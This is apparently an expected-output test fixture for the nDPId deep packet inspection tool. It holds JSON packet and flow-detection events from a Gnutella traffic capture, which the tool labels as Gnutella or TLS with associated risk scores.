-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0sAAEAGN+GOhKUNCgACD3dmxIwAqPIB4YpKRGAS\/\/\/+CQAAAgQFtA=="} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0wAAEAGSwNNOtM0CgACDw7exHgAqewBNESdzWAS\/\/\/ZhQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":90767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90767,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxkxAAIAG9OIKAAIPjoSlDcSMd2bhikpEAKjyAlAQ+vAa1gAA"} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":90768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90768,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoHOhAAIAGsWoKAAIPTTrTNMR4Dt40RJ3NAKnsAlAQ+vD2UQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":90768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90768,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA04AAEAG9E3Co7R+CgACDypJxJAAquYBYmFhZWAS\/\/97mQAAAgQFtA=="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSs1AAIAGLNIKAAIPwqO0fsSQKkliYWFlAKrmAlAQ+vCYZQAA"} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1AAAEAGZwW5u0qtCgACD9DxxI8Aq+ABnMSfU2AS\/\/\/VWAAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1EAAEAG4wi8pcu+CgACD1XrxI0ArNoBciGOTGAS\/\/8ODwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoOIRAAIAGsdQKAAIPubtKrcSP0PGcxJ9TAKvgAlAQ+vDyJAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxP5AAIAGoV4KAAIPvKXLvsSNVetyIY5MAKzaAlAQ+vAq2wAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1UAAEAGyRlYeEnXCgACD1\/yxH8ArdQBY7MtEWAS\/\/9f0wAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1YAAEAGK3HBIH7WCgACD+jMxI4Ars4ByU6XnmAS\/\/9vGAAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo+\/1AAIAGUHQKAAIPWHhJ18R\/X\/Jjsy0RAK3UAlAQ+vB8nwAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1cAAEAGVX5o7qz6CgACD1v8xIgAr8gBAIGaT2AS\/\/\/yGAAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoYpBAAIAGTDoKAAIPwSB+1sSO6MzJTpeeAK7OAlAQ+vCL5AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":90777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90777,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBk9AAIAG0okKAAIPaO6s+sSIW\/wAgZpPAK\/IAlAQ+vAO5QAA"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA14AAEAG805VqCJpCgACD5vkxIAAsMIB8fB5WWAS\/\/+FlQAAAgQFtA=="} 
-00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA18AAEAG3PlXezbqCgACD9NyxH0AsbwBqI15YWAS\/\/+HEAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3DZAAIAGmnkKAAIPVagiacSAm+Tx8HlZALDCAlAQ+vCiYQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90785,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2AAAEAGnkMzRJnWCgACD2aNxJMAsrYBwo+\/QmAS\/\/9bRgAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAooEJAAIAGwBkKAAIPV3s26sR903KojXlhALG8AlAQ+vCj3AAA"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoeOBAAIAGqMYKAAIPM0SZ1sSTZo3Cj79CALK2AlAQ+vB4EgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":90787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90787,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2cAAEAGHo9QB\/zACgACDxroxIoAs7ABAD7ueWAS\/\/\/AYAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":90787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90787,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoIw9AAIAGfuoKAAIPUAf8wMSKGugAPu55ALOwAlAQ+vDdLAAA"} 
-01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":90795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90795,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA24AAEAGymQugHJrCgACDxmyxHoAtKoBziHWF2AS\/\/++AAAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":90796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90796,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoDztAAIAGPpsKAAIPLoBya8R6GbLOIdYXALSqAlAQ+vDazAAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":90799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90799,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3IAAEAGvK6khAoZCgACD9gGxJIAtaQBToGf\/mAS\/\/+tmgAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":90799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90799,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoptFAAIAGmVIKAAIPpIQKGcSS2AZOgZ\/+ALWkAlAQ+vDKZgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":90800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90800,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3YAAEAGCtCwY7AUCgACDxjKxIMAtp4BeVRy4GAS\/\/\/DVQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":90801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90801,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoGLRAAIAGdZUKAAIPsGOwFMSDGMp5VHLgALaeAlAQ+vDgIQAA"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 